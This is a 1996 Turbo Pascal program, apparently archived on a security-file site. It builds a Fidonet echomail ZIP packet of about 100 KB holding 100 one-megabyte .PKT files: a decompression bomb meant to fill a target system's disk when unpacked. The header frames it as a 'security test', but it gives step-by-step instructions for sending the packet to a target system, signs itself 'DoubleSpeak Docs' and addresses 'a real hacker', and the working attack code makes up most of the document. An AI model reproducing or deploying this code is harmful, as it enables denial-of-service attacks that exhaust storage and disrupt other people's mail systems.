(* *)
(* MAKEA.PAS - A Turbo Pascal Program for testing Fidonet echomail security *)
(* *)
(* This program was written and tested in Turbo Pascal 7, it should compile *)
(* fine in TP5.5 and 6 if that's what you have. This file should compile *)
(* right "out of the box" without modification; if it doesn't you might have *)
(* a hacked or corrupted copy. *)
(* *)
(* This program aids in testing the security of echomail systems in Fidonet *)
(* by creating a valid ZIP archive echomail packet. This packet appears *)
(* relatively innocuous at about 100k in size (typical for many echomail *)
(* systems) but it contains PKT files which expand to a megabyte apiece. *)
(* Up to 100 of these 1 meg files will be created, if the target system's *)
(* hard drive has enough space. Fortunately, only one 1MB file is created *)
(* on your system when you run the program. You should have 1.5 MB free. *)
(* *)
(* To test the security of another system, take the following steps: *)
(* *)
(* (1) Compile and run this program. It will create a packet file calling *)
(* PKZIP.EXE (if found on your path). This operation will take several *)
(* minutes, depending on the speed of your system. *)
(* *)
(* (2) File-attach the file to the target system. It is very important *)
(* that you use your own mailer with all your addresses intact and that you *)
(* not use Caller-ID blocking, so that the target sysop knows that this is *)
(* only a test and not an actual attack by a crasher. *)
(* *)
(* That's it. If the target system's echomail processor is insecure, there *)
(* will be up to 100 megs of .PKT files in the target's echomail directory. *)
(* If you are worried you might fill the target's hard disk during this *)
(* test, you should modify the program so as to decrease the number of files *)
(* added to the packet or the size of those files. A larger number of small *)
(* files will result in a larger packet size, and unfortunately, a higher *)
(* likelihood that the test will *completely* fill the hard drive should the *)
(* target be careless enough not to have 100 megs free. And of course, NEVER*)
(* send such a packet to someone who is unaware that you are conducting a *)
(* security test or at a time when the target sysop is unlikely to be *)
(* present to delete the .PKT files! *)
(* *)
(* This program is presented in source form because: *)
(* *)
(* - this way you know for sure it has no virii or trojan surprises *)
(* *)
(* - you can totally reconfigure it or add features *)
(* *)
(* - it's free and I don't care who hacks it up or how *)
(* *)
(* - a real hacker has at least the minimal programming skill needed to *)
(* compile a pascal program! *)
(* *)
(* *)
(* Program and DoubleSpeak Docs [K] KopyLeft 1996 The Kopyleftist *)
(* *)
{$M 8192,0,0}
uses dos;
var i:longint;
name,nextname:string;
zipexe:string;
procedure make1megfile(filename:string); {makes a 1 meg file full of 6's}
var f:text;
begin
assign(f,filename);
rewrite(f);
for i:=1 to 10000 do
write(f,'6666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666');
flush(f);
close(f);
end;
procedure add2zip(zipname,filename:string);
var c,p:string;
begin
c:=zipexe;
p:=zipname+' '+filename;
swapvectors;
exec(c,p);
swapvectors;
end;
procedure _rename(oldname,newname:string);
var f:file;
begin
assign(f,oldname);
rename(f,newname);
end;
procedure getzipexe;
var s:pathstr;
begin
s:=fsearch('PKZIP.EXE',getenv('PATH'));
if
s=''
then
begin
writeln('Unable to locate PKZIP.EXE in path!');
halt;
end;
zipexe:=s;
end;
begin
writeln('Makea by The Kopyleftist');
getzipexe;
name:='1.PKT';
writeln('Creating prototype file...');
make1megfile(name);
writeln('Adding 100 copies to bogus echomail packet zipfile 0000FFFF.MO0...');
add2zip('0000FFFF.MO0',name);
for i:=2 to 100 do
begin
str(i,nextname);
nextname:=nextname+'.PKT';
_rename(name,nextname);
name:=nextname;
add2zip('0000FFFF.MO0',name);
end;
end.
(* Uploaded to: Tommy's Holiday Camp BBS 1-604-361-4549 *)
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
